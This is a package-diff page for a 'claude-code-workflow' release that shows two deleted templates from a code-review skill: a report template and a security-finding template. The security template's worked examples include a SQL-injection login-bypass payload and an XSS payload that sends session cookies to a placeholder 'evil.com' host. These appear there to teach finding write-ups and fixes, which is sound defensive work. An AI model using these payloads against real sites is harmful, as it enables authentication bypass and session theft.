claude-code-workflow 6.3.22 → 6.3.24

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (42) hide show
  1. package/.claude/agents/issue-plan-agent.md +10 -5
  2. package/.claude/commands/issue/plan.md +1 -1
  3. package/.claude/skills/review-code/SKILL.md +170 -0
  4. package/.claude/skills/review-code/phases/actions/action-collect-context.md +139 -0
  5. package/.claude/skills/review-code/phases/actions/action-complete.md +115 -0
  6. package/.claude/skills/review-code/phases/actions/action-deep-review.md +302 -0
  7. package/.claude/skills/review-code/phases/actions/action-generate-report.md +263 -0
  8. package/.claude/skills/review-code/phases/actions/action-quick-scan.md +164 -0
  9. package/.claude/skills/review-code/phases/orchestrator.md +251 -0
  10. package/.claude/skills/review-code/phases/state-manager.md +752 -0
  11. package/.claude/skills/review-code/phases/state-schema.md +174 -0
  12. package/.claude/skills/review-code/specs/issue-classification.md +228 -0
  13. package/.claude/skills/review-code/specs/quality-standards.md +214 -0
  14. package/.claude/skills/review-code/specs/review-dimensions.md +337 -0
  15. package/.claude/skills/review-code/specs/rules/architecture-rules.json +63 -0
  16. package/.claude/skills/review-code/specs/rules/correctness-rules.json +60 -0
  17. package/.claude/skills/review-code/specs/rules/index.md +140 -0
  18. package/.claude/skills/review-code/specs/rules/performance-rules.json +59 -0
  19. package/.claude/skills/review-code/specs/rules/readability-rules.json +60 -0
  20. package/.claude/skills/review-code/specs/rules/security-rules.json +58 -0
  21. package/.claude/skills/review-code/specs/rules/testing-rules.json +59 -0
  22. package/.claude/skills/review-code/templates/issue-template.md +186 -0
  23. package/.claude/skills/review-code/templates/review-report.md +173 -0
  24. package/.claude/skills/skill-generator/SKILL.md +56 -17
  25. package/.claude/skills/skill-generator/templates/autonomous-orchestrator.md +10 -0
  26. package/.claude/skills/skill-generator/templates/sequential-phase.md +9 -0
  27. package/.claude/skills/skill-generator/templates/skill-md.md +84 -5
  28. package/.claude/workflows/cli-templates/schemas/solution-schema.json +3 -3
  29. package/ccw/src/templates/dashboard-js/views/issue-manager.js +8 -0
  30. package/package.json +1 -1
  31. package/.claude/skills/code-reviewer/README.md +0 -340
  32. package/.claude/skills/code-reviewer/SKILL.md +0 -308
  33. package/.claude/skills/code-reviewer/phases/01-code-discovery.md +0 -246
  34. package/.claude/skills/code-reviewer/phases/02-security-analysis.md +0 -442
  35. package/.claude/skills/code-reviewer/phases/03-best-practices-review.md +0 -36
  36. package/.claude/skills/code-reviewer/phases/04-report-generation.md +0 -278
  37. package/.claude/skills/code-reviewer/specs/best-practices-requirements.md +0 -346
  38. package/.claude/skills/code-reviewer/specs/quality-standards.md +0 -252
  39. package/.claude/skills/code-reviewer/specs/security-requirements.md +0 -243
  40. package/.claude/skills/code-reviewer/templates/best-practice-finding.md +0 -234
  41. package/.claude/skills/code-reviewer/templates/report-template.md +0 -316
  42. package/.claude/skills/code-reviewer/templates/security-finding.md +0 -161
@@ -1,316 +0,0 @@
1
- # Report Template
2
-
3
- ## Main Report Structure (REPORT.md)
4
-
5
- ```markdown
6
- # Code Review Report
7
-
8
- **Generated**: {timestamp}
9
- **Scope**: {scope}
10
- **Files Reviewed**: {total_files}
11
- **Total Findings**: {total_findings}
12
-
13
- ---
14
-
15
- ## 📊 Executive Summary
16
-
17
- ### Overall Assessment
18
-
19
- {Brief 2-3 paragraph assessment of code health}
20
-
21
- ### Risk Level: {LOW|MEDIUM|HIGH|CRITICAL}
22
-
23
- {Risk assessment based on findings severity and count}
24
-
25
- ### Key Statistics
26
-
27
- | Metric | Value | Status |
28
- |--------|-------|--------|
29
- | Total Files | {count} | - |
30
- | Files with Issues | {count} | {percentage}% |
31
- | Critical Findings | {count} | {icon} |
32
- | High Findings | {count} | {icon} |
33
- | Medium Findings | {count} | {icon} |
34
- | Low Findings | {count} | {icon} |
35
-
36
- ### Category Breakdown
37
-
38
- | Category | Count | Percentage |
39
- |----------|-------|------------|
40
- | Security | {count} | {percentage}% |
41
- | Code Quality | {count} | {percentage}% |
42
- | Performance | {count} | {percentage}% |
43
- | Maintainability | {count} | {percentage}% |
44
-
45
- ---
46
-
47
- ## 🎯 Quality Scores
48
-
49
- ### Security Score: {score}/100
50
- {Assessment and key issues}
51
-
52
- ### Code Quality Score: {score}/100
53
- {Assessment and key issues}
54
-
55
- ### Performance Score: {score}/100
56
- {Assessment and key issues}
57
-
58
- ### Maintainability Score: {score}/100
59
- {Assessment and key issues}
60
-
61
- ### Overall Score: {score}/100
62
-
63
- **Grade**: {A|B|C|D|F}
64
-
65
- ---
66
-
67
- ## 🔴 Critical Findings (Requires Immediate Action)
68
-
69
- {List all critical findings using security-finding.md template}
70
-
71
- ---
72
-
73
- ## 🟠 High Priority Findings
74
-
75
- {List all high findings}
76
-
77
- ---
78
-
79
- ## 🟡 Medium Priority Findings
80
-
81
- {List all medium findings}
82
-
83
- ---
84
-
85
- ## 🟢 Low Priority Findings
86
-
87
- {List all low findings}
88
-
89
- ---
90
-
91
- ## 📋 Action Plan
92
-
93
- ### Immediate (Within 24 hours)
94
- 1. {Critical issue 1}
95
- 2. {Critical issue 2}
96
- 3. {Critical issue 3}
97
-
98
- ### Short-term (Within 1 week)
99
- 1. {High priority issue 1}
100
- 2. {High priority issue 2}
101
- ...
102
-
103
- ### Medium-term (Within 1 month)
104
- 1. {Medium priority issue 1}
105
- 2. {Medium priority issue 2}
106
- ...
107
-
108
- ### Long-term (Within 3 months)
109
- 1. {Low priority issue 1}
110
- 2. {Improvement initiative 1}
111
- ...
112
-
113
- ---
114
-
115
- ## 📊 Metrics Dashboard
116
-
117
- ### Code Health Trends
118
-
119
- {If historical data available, show trends}
120
-
121
- ### File Hotspots
122
-
123
- Top files with most issues:
124
- 1. `{file-path}` - {count} issues ({severity breakdown})
125
- 2. `{file-path}` - {count} issues
126
- ...
127
-
128
- ### Technology Breakdown
129
-
130
- Issues by language/framework:
131
- - TypeScript: {count} issues
132
- - Python: {count} issues
133
- ...
134
-
135
- ---
136
-
137
- ## ✅ Compliance Status
138
-
139
- ### PCI DSS
140
- - **Status**: {COMPLIANT|NON-COMPLIANT|PARTIAL}
141
- - **Affecting Findings**: {list}
142
-
143
- ### HIPAA
144
- - **Status**: {COMPLIANT|NON-COMPLIANT|PARTIAL}
145
- - **Affecting Findings**: {list}
146
-
147
- ### GDPR
148
- - **Status**: {COMPLIANT|NON-COMPLIANT|PARTIAL}
149
- - **Affecting Findings**: {list}
150
-
151
- ---
152
-
153
- ## 📚 Appendix
154
-
155
- ### A. Review Configuration
156
-
157
- \`\`\`json
158
- {review-config}
159
- \`\`\`
160
-
161
- ### B. Tools and Versions
162
-
163
- - Code Reviewer Skill: v1.0.0
164
- - Security Rules: OWASP Top 10 2021, CWE Top 25
165
- - Languages Analyzed: {list}
166
-
167
- ### C. References
168
-
169
- - [OWASP Top 10 2021](https://owasp.org/Top10/)
170
- - [CWE Top 25](https://cwe.mitre.org/top25/)
171
- - {additional references}
172
-
173
- ### D. Full Findings Index
174
-
175
- {Links to detailed finding JSONs}
176
- ```
177
-
178
- ---
179
-
180
- ## Fix Checklist Template (FIX-CHECKLIST.md)
181
-
182
- ```markdown
183
- # Code Review Fix Checklist
184
-
185
- **Generated**: {timestamp}
186
- **Total Items**: {count}
187
-
188
- ---
189
-
190
- ## 🔴 Critical Issues (Fix Immediately)
191
-
192
- - [ ] **[SEC-001]** SQL Injection in `src/auth/user-service.ts:145`
193
- - Effort: 1 hour
194
- - Priority: P0
195
- - Assignee: ___________
196
-
197
- - [ ] **[SEC-002]** Hardcoded JWT Secret in `src/auth/jwt.ts:23`
198
- - Effort: 30 minutes
199
- - Priority: P0
200
- - Assignee: ___________
201
-
202
- ---
203
-
204
- ## 🟠 High Priority Issues (Fix This Week)
205
-
206
- - [ ] **[SEC-003]** Missing Authorization in `src/api/admin.ts:34`
207
- - Effort: 2 hours
208
- - Priority: P1
209
- - Assignee: ___________
210
-
211
- - [ ] **[BP-001]** N+1 Query in `src/api/orders.ts:45`
212
- - Effort: 1 hour
213
- - Priority: P1
214
- - Assignee: ___________
215
-
216
- ---
217
-
218
- ## 🟡 Medium Priority Issues (Fix This Month)
219
-
220
- {List medium priority items}
221
-
222
- ---
223
-
224
- ## 🟢 Low Priority Issues (Fix Next Release)
225
-
226
- {List low priority items}
227
-
228
- ---
229
-
230
- ## Progress Tracking
231
-
232
- **Overall Progress**: {completed}/{total} ({percentage}%)
233
-
234
- - Critical: {completed}/{total}
235
- - High: {completed}/{total}
236
- - Medium: {completed}/{total}
237
- - Low: {completed}/{total}
238
-
239
- **Estimated Total Effort**: {hours} hours
240
- **Estimated Completion**: {date}
241
- ```
242
-
243
- ---
244
-
245
- ## Summary JSON Template (summary.json)
246
-
247
- ```json
248
- {
249
- "report_date": "2024-01-15T12:00:00Z",
250
- "scope": "src/**/*",
251
- "statistics": {
252
- "total_files": 247,
253
- "files_with_issues": 89,
254
- "total_findings": 69,
255
- "by_severity": {
256
- "critical": 3,
257
- "high": 13,
258
- "medium": 30,
259
- "low": 23
260
- },
261
- "by_category": {
262
- "security": 24,
263
- "code_quality": 18,
264
- "performance": 12,
265
- "maintainability": 15
266
- }
267
- },
268
- "scores": {
269
- "security": 68,
270
- "code_quality": 75,
271
- "performance": 82,
272
- "maintainability": 70,
273
- "overall": 74
274
- },
275
- "grade": "C",
276
- "risk_level": "MEDIUM",
277
- "action_required": true,
278
- "compliance": {
279
- "pci_dss": {
280
- "status": "NON_COMPLIANT",
281
- "affecting_findings": ["SEC-001", "SEC-002", "SEC-008", "SEC-011"]
282
- },
283
- "hipaa": {
284
- "status": "NON_COMPLIANT",
285
- "affecting_findings": ["SEC-005", "SEC-009"]
286
- },
287
- "gdpr": {
288
- "status": "PARTIAL",
289
- "affecting_findings": ["SEC-002", "SEC-005", "SEC-007"]
290
- }
291
- },
292
- "top_issues": [
293
- {
294
- "id": "SEC-001",
295
- "type": "sql-injection",
296
- "severity": "critical",
297
- "file": "src/auth/user-service.ts",
298
- "line": 145
299
- }
300
- ],
301
- "hotspots": [
302
- {
303
- "file": "src/auth/user-service.ts",
304
- "issues": 5,
305
- "severity_breakdown": { "critical": 1, "high": 2, "medium": 2 }
306
- }
307
- ],
308
- "effort_estimate": {
309
- "critical": 4.5,
310
- "high": 18,
311
- "medium": 35,
312
- "low": 12,
313
- "total_hours": 69.5
314
- }
315
- }
316
- ```
@@ -1,161 +0,0 @@
1
- # Security Finding Template
2
-
3
- Use this template for documenting security vulnerabilities.
4
-
5
- ## Finding Structure
6
-
7
- ```json
8
- {
9
- "id": "SEC-{number}",
10
- "type": "{vulnerability-type}",
11
- "severity": "{critical|high|medium|low}",
12
- "file": "{file-path}",
13
- "line": {line-number},
14
- "column": {column-number},
15
- "code": "{vulnerable-code-snippet}",
16
- "message": "{clear-description-of-issue}",
17
- "cwe": "CWE-{number}",
18
- "owasp": "A{number}:2021 - {category}",
19
- "recommendation": {
20
- "description": "{how-to-fix}",
21
- "fix_example": "{corrected-code}"
22
- },
23
- "references": [
24
- "https://...",
25
- "https://..."
26
- ]
27
- }
28
- ```
29
-
30
- ## Markdown Template
31
-
32
- ```markdown
33
- ### 🔴 [SEC-{number}] {Vulnerability Title}
34
-
35
- **File**: `{file-path}:{line}`
36
- **CWE**: CWE-{number} | **OWASP**: A{number}:2021 - {category}
37
-
38
- **Vulnerable Code**:
39
- \`\`\`{language}
40
- {vulnerable-code-snippet}
41
- \`\`\`
42
-
43
- **Issue**: {Detailed explanation of the vulnerability and potential impact}
44
-
45
- **Attack Example** (if applicable):
46
- \`\`\`
47
- {example-attack-payload}
48
- Result: {what-happens}
49
- Effect: {security-impact}
50
- \`\`\`
51
-
52
- **Recommended Fix**:
53
- \`\`\`{language}
54
- {corrected-code-with-comments}
55
- \`\`\`
56
-
57
- **References**:
58
- - [{reference-title}]({url})
59
- - [{reference-title}]({url})
60
-
61
- ---
62
- ```
63
-
64
- ## Severity Icon Mapping
65
-
66
- - Critical: 🔴
67
- - High: 🟠
68
- - Medium: 🟡
69
- - Low: 🟢
70
-
71
- ## Example: SQL Injection Finding
72
-
73
- ```markdown
74
- ### 🔴 [SEC-001] SQL Injection in User Authentication
75
-
76
- **File**: `src/auth/user-service.ts:145`
77
- **CWE**: CWE-89 | **OWASP**: A03:2021 - Injection
78
-
79
- **Vulnerable Code**:
80
- \`\`\`typescript
81
- const query = \`SELECT * FROM users WHERE username = '\${username}'\`;
82
- const user = await db.execute(query);
83
- \`\`\`
84
-
85
- **Issue**: User input (`username`) is directly concatenated into SQL query, allowing attackers to inject malicious SQL commands and bypass authentication.
86
-
87
- **Attack Example**:
88
- \`\`\`
89
- username: ' OR '1'='1' --
90
- Result: SELECT * FROM users WHERE username = '' OR '1'='1' --'
91
- Effect: Bypasses authentication, returns all users
92
- \`\`\`
93
-
94
- **Recommended Fix**:
95
- \`\`\`typescript
96
- // Use parameterized queries
97
- const query = 'SELECT * FROM users WHERE username = ?';
98
- const user = await db.execute(query, [username]);
99
-
100
- // Or use ORM
101
- const user = await User.findOne({ where: { username } });
102
- \`\`\`
103
-
104
- **References**:
105
- - [OWASP SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)
106
- - [CWE-89](https://cwe.mitre.org/data/definitions/89.html)
107
-
108
- ---
109
- ```
110
-
111
- ## Example: XSS Finding
112
-
113
- ```markdown
114
- ### 🟠 [SEC-002] Cross-Site Scripting (XSS) in Comment Rendering
115
-
116
- **File**: `src/components/CommentList.tsx:89`
117
- **CWE**: CWE-79 | **OWASP**: A03:2021 - Injection
118
-
119
- **Vulnerable Code**:
120
- \`\`\`tsx
121
- <div dangerouslySetInnerHTML={{ __html: comment.body }} />
122
- \`\`\`
123
-
124
- **Issue**: User-generated content rendered without sanitization, allowing script injection.
125
-
126
- **Attack Example**:
127
- \`\`\`
128
- comment.body: "<script>fetch('evil.com/steal?cookie='+document.cookie)</script>"
129
- Effect: Steals user session cookies
130
- \`\`\`
131
-
132
- **Recommended Fix**:
133
- \`\`\`tsx
134
- import DOMPurify from 'dompurify';
135
-
136
- // Sanitize HTML before rendering
137
- <div dangerouslySetInnerHTML={{
138
- __html: DOMPurify.sanitize(comment.body)
139
- }} />
140
-
141
- // Or use text content (if HTML not needed)
142
- <div>{comment.body}</div>
143
- \`\`\`
144
-
145
- **References**:
146
- - [OWASP XSS Prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)
147
- - [CWE-79](https://cwe.mitre.org/data/definitions/79.html)
148
-
149
- ---
150
- ```
151
-
152
- ## Compliance Mapping Template
153
-
154
- When finding affects compliance:
155
-
156
- ```markdown
157
- **Compliance Impact**:
158
- - **PCI DSS**: Requirement 6.5.1 (Injection flaws)
159
- - **HIPAA**: Technical Safeguards - Access Control
160
- - **GDPR**: Article 32 (Security of processing)
161
- ```